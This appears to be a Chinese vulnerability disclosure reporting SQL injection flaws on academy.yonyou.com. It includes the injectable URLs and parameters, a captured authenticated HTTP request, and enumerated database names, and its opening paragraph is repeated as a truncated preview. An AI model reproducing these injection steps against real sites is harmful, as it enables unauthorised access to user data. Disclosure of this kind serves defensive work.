### 简要描述: 哎呀呀~ ### 详细说明: 站点: ``` http://academy.yonyou.com ``` 允许注册,新注册一个账户。wooyun 认证-我的所有证书 http://academy.yonyou.com/StaffHome/ViewMapZsPage.aspx?order=z_products&isget=all&name= 加个单引号试试 [<img src="https://images.seebug.org/upload/201401/15112844dc1a4a068d72b3875345586331d333ec.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15112844dc1a4a068d72b3875345586331d333ec.png) name参数存在注入 errorbased注入速度杠杠的,还能update哦亲。 需要登录状态,那就抓个包吧。 ``` GET /StaffHome/ViewMapZsPage.aspx?order=z_products&isget=all&name= HTTP/1.1 Host: academy.yonyou.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=1ig4yi45ul1pbp4525rucbuw ```...
### 简要描述: 哎呀呀~ ### 详细说明: 站点: ``` http://academy.yonyou.com ``` 允许注册,新注册一个账户。wooyun 认证-我的所有证书 http://academy.yonyou.com/StaffHome/ViewMapZsPage.aspx?order=z_products&isget=all&name= 加个单引号试试 [<img src="https://images.seebug.org/upload/201401/15112844dc1a4a068d72b3875345586331d333ec.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15112844dc1a4a068d72b3875345586331d333ec.png) name参数存在注入 errorbased注入速度杠杠的,还能update哦亲。 需要登录状态,那就抓个包吧。 ``` GET /StaffHome/ViewMapZsPage.aspx?order=z_products&isget=all&name= HTTP/1.1 Host: academy.yonyou.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=1ig4yi45ul1pbp4525rucbuw ``` [<img src="https://images.seebug.org/upload/201401/151128243a2d5728dc15df5ff2667186431e49af.png" alt="sqlin.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/151128243a2d5728dc15df5ff2667186431e49af.png) 海量数据,不读了,肯定很多的用户啊,认证什么证书的。 [<img src="https://images.seebug.org/upload/201401/15112911ccc8cba9c5e5c9edd8aebb61207688e2.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15112911ccc8cba9c5e5c9edd8aebb61207688e2.png) ``` available databases [13]: [*] live [*] master [*] model [*] msdb [*] Northwind [*] pubs [*] tempdb [*] Timber_Exam [*] Timber_Exam_YL [*] Timber_PX [*] Timber_PX_New_yy [*] Timber_PX_New_yy0 [*] www_56xue_com ``` 数据库些. 其他注入地点: http://academy.yonyou.com/StaffHome/Zhifu_Info.aspx?goods_id=207&course_id=197 id参数注入。 搜索框注入。 new.aspx的id参数存在注入。 ### 漏洞证明: 见详细说明。